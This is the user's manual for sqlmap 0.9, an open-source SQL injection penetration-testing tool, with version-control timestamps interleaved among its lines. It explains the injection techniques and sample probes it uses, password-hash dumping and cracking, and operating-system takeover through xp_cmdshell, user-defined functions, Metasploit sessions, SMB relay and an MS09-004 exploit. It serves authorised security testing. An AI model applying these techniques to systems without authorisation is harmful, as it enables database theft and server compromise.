2008-10-15 19:38:22 +04:00
<!doctype linuxdoc system>
<article>
<title>sqlmap user's manual
2010-03-02 15:07:54 +03:00
<author>by <htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G.">, <htmlurl url="mailto:miroslav.stampar@gmail.com" name="Miroslav Stampar">
2011-02-07 03:55:10 +03:00
<date>version 0.9, March 10, 2011
2008-10-15 19:38:22 +04:00
<abstract>
This document is the user's manual to use <htmlurl url="http://sqlmap.sourceforge.net" name="sqlmap">.
</abstract>
<toc>
<sect>Introduction
2011-02-07 03:55:10 +03:00
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
sqlmap is an open source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over of
database servers. It comes with a kick-ass detection engine, many niche
features for the ultimate penetration tester and a broad range of switches
lasting from database fingerprinting, over data fetching from the
database, to accessing the underlying file system and executing commands
on the operating system via out-of-band connections.
2008-10-15 19:38:22 +04:00
<sect1>Requirements
<p>
sqlmap is developed in <htmlurl url="http://www.python.org" name="Python">,
a dynamic object-oriented interpreted programming language.
2010-03-03 18:16:43 +03:00
This makes the tool independent from the operating system. It only
2011-02-07 03:55:10 +03:00
requires the Python interpreter version equal or higher than <bf>2.6</bf>.
2008-10-15 19:38:22 +04:00
The interpreter is freely downloadable from its
<htmlurl url="http://python.org/download/" name="official site">.
To make it even easier, many GNU/Linux distributions come out of the box
2010-03-12 20:43:38 +03:00
with Python interpreter installed and other Unices and Mac OSX too provide
2010-03-03 18:16:43 +03:00
it packaged in their formats and ready to be installed.
2008-10-15 19:38:22 +04:00
Windows users can download and install the Python setup-ready installer
for x86, AMD64 and Itanium too.
2009-04-22 15:48:07 +04:00
sqlmap relies on the <htmlurl url="http://metasploit.com/framework/"
name="Metasploit Framework"> for some of its post-exploitation takeover
2010-03-03 18:16:43 +03:00
features. You need to grab a copy of it from the
2009-04-22 15:48:07 +04:00
<htmlurl url="http://metasploit.com/framework/download/" name="download">
2011-02-07 03:55:10 +03:00
page - the required version is <bf>3.5</bf> or higher.
For the ICMP tunneling out-of-band takeover technique, sqlmap requires
<htmlurl url="http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket"
name="Impacket"> library too.
If you are willing to connect directly to a database server (<tt>-d</tt> switch), without passing
via a web application, you need to install Python bindings for the database
management system that you are going to attack:
<itemize>
2011-02-27 15:19:32 +03:00
<item>Firebird: <htmlurl name="python-kinterbasdb" url="http://kinterbasdb.sourceforge.net/">.
<item>Microsoft Access: <htmlurl name="python-pyodbc" url="http://pyodbc.googlecode.com/">.
<item>Microsoft SQL Server: <htmlurl name="python-pymssql" url="http://pymssql.sourceforge.net/">.
<item>MySQL: <htmlurl name="python-mysqldb" url="http://mysql-python.sourceforge.net/">.
<item>Oracle: <htmlurl name="python cx_Oracle" url="http://cx-oracle.sourceforge.net/">.
<item>PostgreSQL: <htmlurl name="python-psycopg2" url="http://initd.org/psycopg/">.
<item>SQLite: <htmlurl name="python-pysqlite2" url="http://pysqlite.googlecode.com/">.
<item>Sybase: <htmlurl name="python-pymssql" url="http://pymssql.sourceforge.net/">.
2011-02-07 03:55:10 +03:00
</itemize>
2010-03-03 18:16:43 +03:00
If you plan to attack a web application behind NTLM authentication or use
2011-02-27 15:19:32 +03:00
the sqlmap update functionality (<tt>-</tt><tt>-update</tt> switch) you need to
2011-02-07 03:55:10 +03:00
install respectively <htmlurl url="http://code.google.com/p/python-ntlm/"
name="python-ntlm"> and <htmlurl url="http://pysvn.tigris.org/"
name="python-svn"> libraries.
2009-04-22 15:48:07 +04:00
2008-10-15 19:38:22 +04:00
Optionally, if you are running sqlmap on Windows, you may wish to install
<htmlurl url="http://ipython.scipy.org/moin/PyReadline/Intro" name="PyReadline">
2008-12-04 20:40:03 +03:00
library to be able to take advantage of the sqlmap TAB completion and
2011-02-07 03:55:10 +03:00
history support features in the SQL shell and OS shell.
2008-12-29 21:44:20 +03:00
Note that these functionalities are available natively by Python standard
<htmlurl url="http://docs.python.org/library/readline.html" name="readline">
library on other operating systems.
2010-03-12 20:43:38 +03:00
You can also choose to install <htmlurl url="http://psyco.sourceforge.net/"
2011-02-07 03:55:10 +03:00
name="Psyco"> library to eventually speed up the sqlmap algorithmic
operations.
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
2008-10-15 19:38:22 +04:00
<sect1>Scenario
2011-02-07 03:55:10 +03:00
<sect2>Detect and exploit a SQL injection
2008-10-15 19:38:22 +04:00
<p>
Let's say that you are auditing a web application and found a web page
that accepts dynamic user-provided values on <tt>GET</tt> or <tt>POST</tt>
parameters or HTTP <tt>Cookie</tt> values or HTTP <tt>User-Agent</tt>
header value.
You now want to test if these are affected by a SQL injection
vulnerability, and if so, exploit them to retrieve as much information as
possible out of the web application's back-end database management system
2011-02-07 03:55:10 +03:00
or even be able to access the underlying file system and operating system.
2008-10-15 19:38:22 +04:00
2011-02-07 03:55:10 +03:00
In a simple world, consider that the target url is:
2008-10-15 19:38:22 +04:00
2011-02-07 03:55:10 +03:00
<tscreen><tt>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1</tt></tscreen>
2008-10-15 19:38:22 +04:00
Assume that:
2011-02-07 03:55:10 +03:00
<tscreen><tt>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1</tt></tscreen>
2008-10-15 19:38:22 +04:00
is the same page as the original one and:
2011-02-07 03:55:10 +03:00
<tscreen><tt>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2</tt></tscreen>
2008-10-15 19:38:22 +04:00
differs from the original one, it means that you are in front of a SQL
injection vulnerability in the <tt>id</tt> <tt>GET</tt> parameter of the
2011-02-07 03:55:10 +03:00
<tt>index.php</tt> web application page which means that potentially no
IDS/IPS, no web application firewall, no parameters' value sanitization is
performed on the server-side before sending the SQL statement to the
back-end database management system the web application relies on.
2008-10-15 19:38:22 +04:00
This is a quite common flaw in dynamic content web applications and it
does not depend upon the back-end database management system nor on the web
application programming language: it is a programmer code's security flaw.
The <htmlurl url="http://www.owasp.org" name="Open Web Application Security Project">
2010-03-03 18:16:43 +03:00
rated on 2010 in their <htmlurl url="http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"
2008-10-15 19:38:22 +04:00
name="OWASP Top Ten"> survey this vulnerability as the <htmlurl
2011-02-07 03:55:10 +03:00
url="http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202010.pdf" name="most
2010-03-03 18:16:43 +03:00
common"> and important web application vulnerability along with other
injection flaws.
2008-10-15 19:38:22 +04:00
2009-11-01 15:08:46 +03:00
Back to the scenario, probably the SQL <tt>SELECT</tt> statement into
2008-12-12 22:06:31 +03:00
<tt>get_int.php</tt> has a syntax similar to the following SQL query, in
2008-10-15 19:38:22 +04:00
pseudo PHP code:
<tscreen><tt>
$query = "SELECT [column(s) name] FROM [table name] WHERE id=" . $_REQUEST['id'];
</tt></tscreen>
As you can see, appending any other syntatically valid SQL condition after
a value for <tt>id</tt> such condition will take place when the web
application passes the query to the back-end database management system
that executes it, that is why the condition <tt>id=1 AND 1=1</tt> is valid
(<em>True</em>) and returns the same page as the original one, with the
2011-02-07 03:55:10 +03:00
same content. This is the case of a boolean-based blind SQL injection
vulnerability. However, sqlmap is able to detect any type of SQL injection
and adapt its work-flow accordingly. Read below for further details.
2008-10-15 19:38:22 +04:00
Moreover, in this simple and easy to inject scenario it would be also
possible to append, not just one or more valid SQL condition(s), but also
stacked SQL queries, for instance something like <tt>[...]&id=1;
2008-12-12 22:06:31 +03:00
ANOTHER SQL QUERY#</tt> if the web application technology supports
<em>stacked queries</em>, also known as <em>multiple statements</em>.
2008-10-15 19:38:22 +04:00
Now that you found this SQL injection vulnerable parameter, you can
exploit it by manipulating the <tt>id</tt> parameter value in the HTTP
request.
2008-12-12 22:06:31 +03:00
There exist many <htmlurl url="http://delicious.com/inquis/sqlinjection" name="resources">
2011-02-07 03:55:10 +03:00
on the Net explaining in depth how to prevent, detect and exploit SQL
injection vulnerabilities in web application and it is recommended to read
them if you are not familiar with the issue before going ahead with sqlmap.
2008-10-15 19:38:22 +04:00
2011-02-07 03:55:10 +03:00
Passing the original address, <tt>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1</tt>
2008-10-15 19:38:22 +04:00
to sqlmap, the tool will automatically:
<itemize>
2011-02-07 03:55:10 +03:00
<item>Identify the vulnerable parameter(s) (<tt>id</tt> in this example);
<item>Identify which SQL injection techniques can be used to exploit the
vulnerable parameter(s);
<item>Fingerprint the back-end database management system;
<item>Depending on the user's options, it will extensively fingerprint,
enumerate data or takeover the database server as a whole.
2008-10-15 19:38:22 +04:00
</itemize>
2011-02-07 03:55:10 +03:00
<sect2>Direct connection to the database management system
<p>
Up until sqlmap version <bf>0.8</bf>, the tool has been <em>yet another
SQL injection tool</em>, used by web application penetration testers/newbies/curious
teens/computer addicted/punks and so on. Things move on
and as they evolve, we do as well. Now it supports this new switch,
<tt>-d</tt>, that allows you to connect from your machine to the database
server's TCP port where the database management system daemon is listening
on and perform any operation you would do while using it to attack a
database via a SQL injection vulnerability.
2008-10-15 19:38:22 +04:00
<sect1>Techniques
<p>
2011-02-27 15:19:32 +03:00
sqlmap is able to detect and exploit five different SQL injection
<em>types</em>:
2008-10-15 19:38:22 +04:00
<itemize>
2011-02-07 03:55:10 +03:00
<item><bf>Boolean-based blind SQL injection</bf>, also known as <bf>inferential
2011-02-20 00:08:18 +03:00
SQL injection</bf>: sqlmap replaces or appends to the affected parameter in
the HTTP request, a syntatically valid SQL statement string containing a
2009-04-22 15:48:07 +04:00
<tt>SELECT</tt> sub-statement, or any other SQL statement whose the user
want to retrieve the output.
2011-02-07 03:55:10 +03:00
For each HTTP response, by making a comparison between the HTTP response
headers/body with the original request, the tool inference the output of
the injected statement character by character. Alternatively, the user
can provide a string or regular expression to match on True pages.
2008-10-15 19:38:22 +04:00
The bisection algorithm implemented in sqlmap to perform this technique
2011-02-07 03:55:10 +03:00
is able to fetch each character of the output with a maximum of seven HTTP
requests. Where the output is not within the clear-text plain charset,
sqlmap will adapt the algorithm with bigger ranges to detect the output.
2011-02-20 00:08:18 +03:00
<item><bf>Time-based blind SQL injection</bf>, also known as <bf>full blind
SQL injection</bf>: sqlmap replaces or appends to the affected parameter in
the HTTP request, a syntatically valid SQL statement string containing a
query which put on hold the back-end DBMS to return for a certain number
of seconds.
For each HTTP response, by making a comparison between the HTTP response
time with the original request, the tool inference the output of
the injected statement character by character. Like for boolean-based
technique, the bisection algorithm is applied.
2011-02-07 03:55:10 +03:00
<item><bf>Error-based SQL injection</bf>: sqlmap replaces or append to the
affected parameter a database-specific syntatically wrong statement and
parses the HTTP response headers and body in search of DBMS error messages
containing the injected pre-defined chain of characters and the statement
output within. This technique works when the web application has been
configured to disclose back-end database management system error messages
only.
<item><bf>UNION query SQL injection</bf>, also known as <bf>inband SQL
injection</bf>: sqlmap appends to the affected parameter a syntatically
valid SQL statement string starting with a <tt>UNION ALL SELECT</tt>.
This techique works when the web application page passes the output of the
<tt>SELECT</tt> statement within a <tt>for</tt> cycle, or similar, so that
each line of the query output is printed on the page content.
2009-04-22 15:48:07 +04:00
sqlmap is also able to exploit <bf>partial (single entry) UNION query SQL
2011-02-07 03:55:10 +03:00
injection</bf> vulnerabilities which occur when the output of the
statement is not cycled in a <tt>for</tt> construct whereas only the first
entry of the query output is displayed.
<item><bf>Stacked queries SQL injection</bf>, also known as <bf>multiple
statements SQL injection</bf>: sqlmap tests if the web application supports
2008-12-21 19:35:45 +03:00
stacked queries then, in case it does support, it appends to the affected
parameter in the HTTP request, a semi-colon (<tt>;</tt>) followed by the
2009-01-04 01:59:22 +03:00
SQL statement to be executed. This technique is useful to run SQL
2008-12-21 19:35:45 +03:00
statements other than <tt>SELECT</tt> like, for instance, <em>data
definition</em> or <em>data manipulation</em> statements possibly leading
to file system read and write access and operating system command
2009-01-04 01:59:22 +03:00
execution depending on the underlying back-end database management system
and the session user privileges.
2008-10-15 19:38:22 +04:00
</itemize>
2011-02-20 00:08:18 +03:00
2010-03-12 20:43:38 +03:00
<sect1>Demo
<p>
You can watch several demo videos, they are hosted on <htmlurl
2011-02-07 03:55:10 +03:00
url="http://www.youtube.com/user/inquisb#g/u" name="YouTube">.
2010-03-12 20:43:38 +03:00
2011-02-20 00:08:18 +03:00
<sect>Features
<p>
2011-02-27 15:19:32 +03:00
Features implemented in sqlmap include:
2011-02-20 00:08:18 +03:00
<sect1>Generic features
<p>
<itemize>
<item>Full support for <bf>MySQL</bf>, <bf>Oracle</bf>, <bf>PostgreSQL</bf>,
<bf>Microsoft SQL Server</bf>, <bf>Microsoft Access</bf>, <bf>SQLite</bf>,
<bf>Firebird</bf>, <bf>Sybase</bf> and <bf>SAP MaxDB</bf> database
management systems.
<item>Full support for five SQL injection techniques: <bf>boolean-based
blind</bf>, <bf>time-based blind</bf>, <bf>error-based</bf>,
<bf>UNION query</bf> and <bf>stacked queries</bf>.
2011-02-27 15:19:32 +03:00
<item>Support to <bf>directly connect to the database</bf> without passing
via a SQL injection, by providing DBMS credentials, IP address, port and
database name.
2011-02-20 00:08:18 +03:00
<item>It is possible to provide a single target URL, get the list of
targets from <htmlurl url="http://portswigger.net/suite/" name="Burp proxy">
2011-02-27 15:19:32 +03:00
or <htmlurl url="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project"
name="WebScarab proxy"> requests log files, get the whole HTTP request
from a text file or get the list of targets by providing sqlmap with a
Google dork which queries <htmlurl url="http://www.google.com"
2011-02-20 00:08:18 +03:00
name="Google"> search engine and parses its results page. You can also
define a regular-expression based scope that is used to identify which of
the parsed addresses to test.
<item>Tests provided <bf>GET</bf> parameters, <bf>POST</bf> parameters,
HTTP <bf>Cookie</bf> header values, HTTP <bf>User-Agent</bf> header value
2011-02-27 15:19:32 +03:00
and HTTP <bf>Referer</bf> header value to identify and exploit SQL
injection vulnerabilities. It is also possible to specify a comma-separated
list of specific parameter(s) to test.
<item>Option to specify the <bf>maximum number of concurrent HTTP(S)
requests (multi-threading)</bf> to speed up the blind SQL injection
2011-02-28 18:23:05 +03:00
techniques. Vice versa, it is also possible to specify the number of
seconds to hold between each HTTP(S) request. Others optimization switches
to speed up the exploitation are implemented too.
2011-02-20 00:08:18 +03:00
<item><bf>HTTP <tt>Cookie</tt> header</bf> string support, useful when the
web application requires authentication based upon cookies and you have
such data or in case you just want to test for and exploit SQL injection
2011-02-27 15:19:32 +03:00
on such header values. You can also specify to always URL-encode the
Cookie.
2011-02-20 00:08:18 +03:00
2011-02-27 15:19:32 +03:00
<item>Automatically handles <bf>HTTP <tt>Set-Cookie</tt> header</bf> from
2011-02-20 00:08:18 +03:00
the application, re-establishing of the session if it expires. Test and
2011-02-27 15:19:32 +03:00
exploit on these values is supported too. Vice versa, you can also force
to ignore any <tt>Set-Cookie</tt> header.
2011-02-20 00:08:18 +03:00
2011-02-27 15:19:32 +03:00
<item>HTTP protocol <bf>Basic, Digest, NTLM and Certificate
authentications</bf> support.
2011-02-20 00:08:18 +03:00
2011-02-27 15:19:32 +03:00
<item><bf>HTTP(S) proxy</bf> support to pass by the requests to the target
application that works also with HTTPS requests and with authenticated
proxy servers.
2011-02-20 00:08:18 +03:00
<item>Options to fake the <bf>HTTP <tt>Referer</tt> header</bf> value and
the <bf>HTTP <tt>User-Agent</tt> header</bf> value specified by user or
2011-02-27 15:19:32 +03:00
randomly selected from a textual file.
2011-02-20 00:08:18 +03:00
<item>Support to increase the <bf>verbosity level of output messages</bf>:
2011-02-27 15:19:32 +03:00
there exist <bf>seven levels</bf> of verbosity.
<item>Support to <bf>parse HTML forms</bf> from the target URL and forge
HTTP(S) requests against those pages to test the form parameters against
vulnerabilities.
2011-02-20 00:08:18 +03:00
2011-02-27 15:19:32 +03:00
<item><bf>Granularity and flexibility</bf> in terms of both user's
switches and features.
2011-02-20 00:08:18 +03:00
<item><bf>Estimated time of arrival</bf> support for each query, updated
2011-02-27 15:19:32 +03:00
in real time, to provide the user with an overview on how long it will
take to retrieve the queries' output.
2011-02-20 00:08:18 +03:00
2011-02-27 15:19:32 +03:00
<item>Automatically saves the session (queries and their output, even if
partially retrieved) on a textual file in real time while fetching the
data and <bf>resumes the injection</bf> by parsing the session file.
2011-02-20 00:08:18 +03:00
<item>Support to read options from a configuration INI file rather than
2011-02-27 15:19:32 +03:00
specify each time all of the switches on the command line. Support also to
generate a configuration file based on the command line switches provided.
<item>Support to <bf>replicate the back-end database tables structure and
entries</bf> on a local SQLite 3 database.
2011-02-20 00:08:18 +03:00
2011-02-27 15:19:32 +03:00
<item>Option to update sqlmap to the latest development version from the
subversion repository.
<item>Support to parse HTTP(S) responses and display any DBMS error
message to the user.
2011-02-20 00:08:18 +03:00
<item>Integration with other IT security open source projects,
<htmlurl url="http://metasploit.com/framework/" name="Metasploit"> and <htmlurl
url="http://w3af.sourceforge.net/" name="w3af">.
</itemize>
<sect1>Fingerprint and enumeration features
<p>
<itemize>
<item><bf>Extensive back-end database software version and underlying
operating system fingerprint</bf> based upon
2011-02-27 15:19:32 +03:00
<htmlurl url="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html" name="error messages">,
2011-02-20 00:08:18 +03:00
<htmlurl url="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html" name="banner parsing">,
<htmlurl url="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html" name="functions output comparison"> and
<htmlurl url="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html" name="specific features">
such as MySQL comment injection. It is also possible to force the back-end
database management system name if you already know it.
2011-02-27 15:19:32 +03:00
<item>Basic web server software and web application technology
fingerprint.
2011-02-20 00:08:18 +03:00
<item>Support to retrieve the DBMS <bf>banner</bf>, <bf>session user</bf>
and <bf>current database</bf> information. The tool can also check if the
2011-02-27 15:19:32 +03:00
session user is a <bf>database administrator</bf> (DBA).
2011-02-20 00:08:18 +03:00
<item>Support to enumerate <bf>database users</bf>, <bf>users' password
2011-02-27 15:19:32 +03:00
hashes</bf>, <bf>users' privileges</bf>, <bf>users' roles</bf>,
<bf>databases</bf>, <bf>tables</bf> and <bf>columns</bf>.
<item>Automatic recognition of password hashes format and support to
<bf>crack them with a dictionary-based attack</bf>.
2011-02-20 00:08:18 +03:00
2011-02-27 15:19:32 +03:00
<item>Support to <bf>brute-force tables and columns name</bf>. This is
useful when the session user has no read access over the system table
containing schema information or when the database management system does
not store this information anywhere (e.g. MySQL < 5.0).
2011-02-20 00:08:18 +03:00
2011-02-27 15:19:32 +03:00
<item>Support to <bf>dump database tables</bf> entirely, a range of
entries or specific columns as per user's choice. The user can also choose
to dump only a range of characters from each column's entry.
<item>Support to automatically <bf>dump all databases</bf>' schemas and
2011-02-20 00:08:18 +03:00
entries. It is possibly to exclude from the dump the system databases.
2011-02-27 15:19:32 +03:00
<item>Support to <bf>search for specific database names, specific tables
across all databases or specific columns across all databases'
tables</bf>. This is useful, for instance, to identify tables containing
custom application credentials where relevant columns' names contain
string like <em>name</em> and <em>pass</em>.
2011-02-20 00:08:18 +03:00
<item>Support to <bf>run custom SQL statement(s)</bf> as in an interactive
SQL client connecting to the back-end database. sqlmap automatically
2011-02-27 15:19:32 +03:00
dissects the provided statement, determines which technique fits best to
2011-02-20 00:08:18 +03:00
inject it and how to pack the SQL payload accordingly.
</itemize>
<sect1>Takeover features
<p>
Some of these techniques are detailed in the white paper
2011-02-27 15:19:32 +03:00
<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
2011-02-20 00:08:18 +03:00
name="Advanced SQL injection to operating system full control"> and in the
slide deck <htmlurl url="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database"
name="Expanding the control over the operating system from the database">.
<itemize>
<item>Support to <bf>inject custom user-defined functions</bf>: the user
2011-02-27 15:19:32 +03:00
can compile a shared library then use sqlmap to create within the back-end
DBMS user-defined functions out of the compiled shared library file. These
UDFs can then be executed, and optionally removed, via sqlmap. This is
supported when the database software is MySQL or PostgreSQL.
2011-02-20 00:08:18 +03:00
2011-02-27 15:19:32 +03:00
<item>Support to <bf>download and upload any file</bf> from the database
2011-02-20 00:08:18 +03:00
server underlying file system when the database software is MySQL,
PostgreSQL or Microsoft SQL Server.
<item>Support to <bf>execute arbitrary commands and retrieve their
standard output</bf> on the database server underlying operating system
when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
<itemize>
<item>On MySQL and PostgreSQL via user-defined function injection and
execution.
<item>On Microsoft SQL Server via <tt>xp_cmdshell()</tt> stored procedure.
Also, the stored procedure is re-enabled if disabled or created from
2011-02-27 15:19:32 +03:00
scratch if removed by the DBA.
2011-02-20 00:08:18 +03:00
</itemize>
<item>Support to <bf>establish an out-of-band stateful TCP connection
2011-02-27 15:19:32 +03:00
between the attacker machine and the database server</bf> underlying
operating system. This channel can be an interactive command prompt, a
Meterpreter session or a graphical user interface (VNC) session as per
user's choice.
2011-02-20 00:08:18 +03:00
sqlmap relies on Metasploit to create the shellcode and implements four
different techniques to execute it on the database server. These
techniques are:
<itemize>
<item>Database <bf>in-memory execution of the Metasploit's shellcode</bf>
via sqlmap own user-defined function <tt>sys_bineval()</tt>. Supported on
MySQL and PostgreSQL.
<item>Upload and execution of a Metasploit's <bf>stand-alone payload
stager</bf> via sqlmap own user-defined function <tt>sys_exec()</tt> on
MySQL and PostgreSQL or via <tt>xp_cmdshell()</tt> on Microsoft SQL
Server.
<item>Execution of Metasploit's shellcode by performing a <bf>SMB
reflection attack</bf> (<htmlurl
url="http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx"
name="MS08-068">) with a UNC path request from the database server to
2011-02-27 15:19:32 +03:00
the attacker's machine where the Metasploit <tt>smb_relay</tt> server
exploit listens. Supported when running sqlmap with high privileges
(<tt>uid=0</tt>) on Linux/Unix and the target DBMS runs as Administrator
on Windows.
2011-02-20 00:08:18 +03:00
<item>Database in-memory execution of the Metasploit's shellcode by
exploiting <bf>Microsoft SQL Server 2000 and 2005
<tt>sp_replwritetovarbin</tt> stored procedure heap-based buffer
overflow</bf> (<htmlurl
url="http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx"
2011-02-27 15:19:32 +03:00
name="MS09-004">). sqlmap has its own exploit to trigger the
vulnerability with automatic DEP memory protection bypass, but it relies
on Metasploit to generate the shellcode to get executed upon successful
exploitation.
2011-02-20 00:08:18 +03:00
</itemize>
<item>Support for <bf>database process' user privilege escalation</bf> via
Metasploit's <tt>getsystem</tt> command which include, among others,
the <htmlurl
url="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html"
name="kitrap0d"> technique (<htmlurl
url="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx"
2011-02-27 15:19:32 +03:00
name="MS10-015">).
2011-02-20 00:08:18 +03:00
<item>Support to access (read/add/delete) Windows registry hives.
</itemize>
2011-02-27 15:19:32 +03:00
<sect>History
2010-05-06 15:09:03 +04:00
2011-02-27 15:19:32 +03:00
<sect1>2011
2011-02-07 03:55:10 +03:00
<p>
<itemize>
<item><bf>March 10</bf>, <htmlurl name="Bernardo and Miroslav"
url="http://sqlmap.sourceforge.net/#developers"> release sqlmap
<bf>0.9</bf> featuring a totally rewritten and powerful SQL injection
detection engine, the possibility to connect directly to a database
server, support for time-based blind SQL injection and error-based SQL
injection, support for four new database management systems and much more.
</itemize>
2011-02-27 15:19:32 +03:00
<sect1>2010
2010-05-06 15:09:03 +04:00
<p>
<itemize>
2011-02-07 03:55:10 +03:00
<item><bf>December</bf>, <htmlurl name="Bernardo and Miroslav"
url="http://sqlmap.sourceforge.net/#developers"> have enhanced sqlmap a
lot during the whole year and prepare to release sqlmap <bf>0.9</bf>
within the first quarter of 2011.
<item><bf>June 3</bf>, Bernardo <htmlurl name="presents"
url="http://www.slideshare.net/inquis/ath-con-2010bernardodamelegotdbownnet">
2011-02-27 15:19:32 +03:00
a talk titled <em>Got database access? Own the network!</em> at AthCon
2010 in Athens (Greece).
2010-05-06 15:09:03 +04:00
<item><bf>March 14</bf>, <htmlurl name="Bernardo and Miroslav"
2011-02-07 03:55:10 +03:00
url="http://sqlmap.sourceforge.net/#developers"> release stable version of
2010-05-06 15:09:03 +04:00
sqlmap <bf>0.8</bf> featuring many features. Amongst these, support to
enumerate and dump all databases' tables containing user provided
column(s), stabilization and enhancements to the takeover functionalities,
updated integration with Metasploit 3.3.3 and a lot of minor features and
bug fixes.
2010-05-06 18:18:25 +04:00
<item><bf>March</bf>, sqlmap demo videos have been <htmlurl
2011-02-27 15:19:32 +03:00
name="published" url="http://www.youtube.com/inquisb#g/u">.
2010-05-06 15:09:03 +04:00
<item><bf>January</bf>, Bernardo is <htmlurl name="invited"
url="http://www.athcon.org/speakers/"> to present at <htmlurl
2011-02-07 03:55:10 +03:00
name="AthCon" url="http://www.athcon.org/archives/2010-2/"> conference in
Greece on June 2010.
2010-05-06 15:09:03 +04:00
</itemize>
2011-02-27 15:19:32 +03:00
<sect1>2009
2010-05-06 15:09:03 +04:00
<p>
<itemize>
2010-05-13 02:02:18 +04:00
<item><bf>December 18</bf>, Miroslav Stampar replies to the call for
developers. Along with Bernardo, he actively develops sqlmap from version
<bf>0.8 release candidate 2</bf>.
2010-05-06 15:09:03 +04:00
<item><bf>December 12</bf>, Bernardo writes to the mailing list a post
titled <htmlurl url="http://bernardodamele.blogspot.com/2009/12/sqlmap-state-of-art-3-years-later.html"
name="sqlmap state of art - 3 years later"> highlighting the goals
achieved during these first three years of the project and launches a call
for developers.
2010-05-13 02:02:18 +04:00
<item><bf>December 4</bf>, sqlmap-devel mailing list has been merged into
2010-05-06 15:09:03 +04:00
sqlmap-users <htmlurl name="mailing list" url="http://sqlmap.sourceforge.net/#ml">.
<item><bf>November 20</bf>, Bernardo and Guido present again their
research on stealth database server takeover at CONfidence 2009 in Warsaw,
Poland.
<item><bf>September 26</bf>, sqlmap version <bf>0.8 release candidate
2011-02-27 15:19:32 +03:00
1</bf> goes public on the <htmlurl name="subversion repository"
2010-05-06 15:09:03 +04:00
url="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/">, with all the attack
vectors unveiled at SOURCE Barcelona 2009 Conference. These include an
enhanced version of the Microsoft SQL Server buffer overflow exploit to
automatically bypass DEP memory protection, support to establish the
out-of-band connection with the database server by executing in-memory
the Metasploit shellcode via UDF <em>sys_bineval()</em> (anti-forensics
technique), support to access the Windows registry hives and support to
inject custom user-defined functions.
<item><bf>September 21</bf>, Bernardo and <htmlurl name="Guido Landi"
url="http://www.pornosecurity.org"> <htmlurl name="present"
2011-02-27 15:19:32 +03:00
url="http://www.sourceconference.com/index.php/pastevents/source-barcelona-2009/schedule">
their research (<htmlurl name="slides"
url="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database">)
at SOURCE Conference 2009 in Barcelona, Spain.
2010-05-06 15:09:03 +04:00
2010-05-13 02:02:18 +04:00
<item><bf>August</bf>, Bernardo is accepted as a speaker at two others IT
2011-02-27 15:19:32 +03:00
security conferences, <htmlurl url="http://www.sourceconference.com/index.php/pastevents/source-barcelona-2009"
name="SOURCE Barcelona 2009"> and <htmlurl url="http://200902.confidence.org.pl/"
2010-05-06 15:09:03 +04:00
name="CONfidence 2009 Warsaw">.
This new research is titled <em>Expanding the control over the operating
system from the database</em>.
<item><bf>July 25</bf>, stable version of sqlmap <bf>0.7</bf> is out!
2010-05-06 15:22:53 +04:00
<item><bf>June 27</bf>, Bernardo <htmlurl name="presents"
url="http://www.slideshare.net/inquis/sql-injection-not-only-and-11-updated">
an updated version of his
<em>SQL injection: Not only AND 1=1</em> slides at <htmlurl name="2nd
Digital Security Forum" url="http://www.digitalsecurityforum.eu/"> in
Lisbon, Portugal.
2010-05-13 02:02:18 +04:00
<item><bf>June 2</bf>, sqlmap version <bf>0.6.4</bf> has made its way to
2010-05-06 15:09:03 +04:00
the official Ubuntu repository too.
<item><bf>May</bf>, Bernardo presents again his research on operating
system takeover via SQL injection at <htmlurl
url="http://www.owasp.org/index.php/OWASP_AppSec_Europe_2009_-_Poland"
name="OWASP AppSec Europe 2009"> in Warsaw, Poland and at <htmlurl
url="http://eusecwest.com/" name="EUSecWest 2009"> in London, UK.
<item><bf>May 8</bf>, sqlmap version <bf>0.6.4</bf> has been officially
accepted in Debian repository. Details on <htmlurl
url="http://bernardodamele.blogspot.com/2009/05/sqlmap-in-debian-package-repository.html"
name="this blog post">.
<item><bf>April 22</bf>, sqlmap version <bf>0.7 release candidate 1</bf>
goes public, with all the attack vectors unveiled at Black Hat Europe 2009
Conference.
These include execution of arbitrary commands on the underlying operating
system, full integration with Metasploit to establish an out-of-band
TCP connection, first publicly available exploit for Microsoft Security
Bulletin <htmlurl url="http://www.microsoft.com/technet/security/Bulletin/MS09-004.mspx"
name="MS09-004"> against Microsoft SQL Server 2000 and 2005 and others
attacks to takeover the database server as a whole, not only the data from
the database.
<item><bf>April 16</bf>, Bernardo <htmlurl url="http://www.blackhat.com/html/bh-europe-09/bh-eu-09-archives.html#Damele"
name="presents"> his research (<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides" name="slides">, <htmlurl
2011-02-27 15:19:32 +03:00
url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
2010-05-06 15:09:03 +04:00
name="whitepaper">) at Black Hat Europe 2009 in Amsterdam, The Netherlands.
The feedback from the audience is good and there has been some
<htmlurl url="http://bernardodamele.blogspot.com/2009/03/black-hat-europe-2009.html"
name="media coverage"> too.
